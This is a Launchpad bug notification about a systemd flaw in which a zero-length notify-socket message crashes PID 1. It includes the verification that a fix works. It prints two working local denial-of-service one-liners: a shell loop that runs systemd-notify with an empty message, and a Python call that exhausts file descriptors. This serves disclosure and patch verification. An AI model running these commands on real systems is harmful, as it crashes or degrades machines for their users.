I verified that with the -proposed version you cannot create orphaned notify FDs any more in pid 1 using the test case I just added.
** Description changed: Environment: Xenial 16.04.1 Amd64 Description. Systemd fails an assertion in manager_invoke_notify_message when a zero- length message is received over /run/systemd/notify. This allows a local user to perform a denial-of-service attack against PID 1. How to trigger the bug: $ while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done The following entries are written into /var/log/syslog, at this point systemd is crashed. Sep 28 20:57:20 ubuntu systemd[1]: Started User Manager for UID 1000. Sep 28 20:57:28 ubuntu systemd[1]: Assertion 'n > 0' failed at ../src/core/manager.c:1501, function manager_invoke_notify_message(). Aborting. Sep 28 20:57:29 ubuntu systemd[1]: Caught <ABRT>, dumped core as pid 1307. Sep 28 20:57:29 ubuntu systemd[1]: Freezing execution. + Public bug: https://github.com/systemd/systemd/issues/4234 - Public bug: https://github.com/systemd/systemd/issues/4234 + The original USN/security fix in + https://launchpad.net/ubuntu/+source/systemd/229-4ubuntu10 introduced + another local DoS due to fd exhaustion: + + NOTIFY_SOCKET=/run/systemd/notify python3 -c 'from systemd import + daemon; daemon.notify("", fds=[0]*100)' + + Run this a few times and watch "sudo ls -l /proc/1/fd" grow. ** Tags removed: verification-needed ** Tags added: verification-done -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1628687 Title: Assertion failure when PID 1 receives a zero-length message over notify socket Status in systemd: Fix Released Status in systemd package in Ubuntu: Fix Released Status in systemd source package in Xenial: Fix Committed Status in systemd source package in Yakkety: Fix Released Bug description: Environment: Xenial 16.04.1 Amd64 Description. Systemd fails an assertion in manager_invoke_notify_message when a zero-length message is received over /run/systemd/notify. This allows a local user to perform a denial-of-service attack against PID 1. How to trigger the bug: $ while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done The following entries are written into /var/log/syslog, at this point systemd is crashed. Sep 28 20:57:20 ubuntu systemd[1]: Started User Manager for UID 1000. Sep 28 20:57:28 ubuntu systemd[1]: Assertion 'n > 0' failed at ../src/core/manager.c:1501, function manager_invoke_notify_message(). Aborting. Sep 28 20:57:29 ubuntu systemd[1]: Caught <ABRT>, dumped core as pid 1307. Sep 28 20:57:29 ubuntu systemd[1]: Freezing execution. Public bug: https://github.com/systemd/systemd/issues/4234 The original USN/security fix in https://launchpad.net/ubuntu/+source/systemd/229-4ubuntu10 introduced another local DoS due to fd exhaustion: NOTIFY_SOCKET=/run/systemd/notify python3 -c 'from systemd import daemon; daemon.notify("", fds=[0]*100)' Run this a few times and watch "sudo ls -l /proc/1/fd" grow. To manage notifications about this bug go to: https://bugs.launchpad.net/systemd/+bug/1628687/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
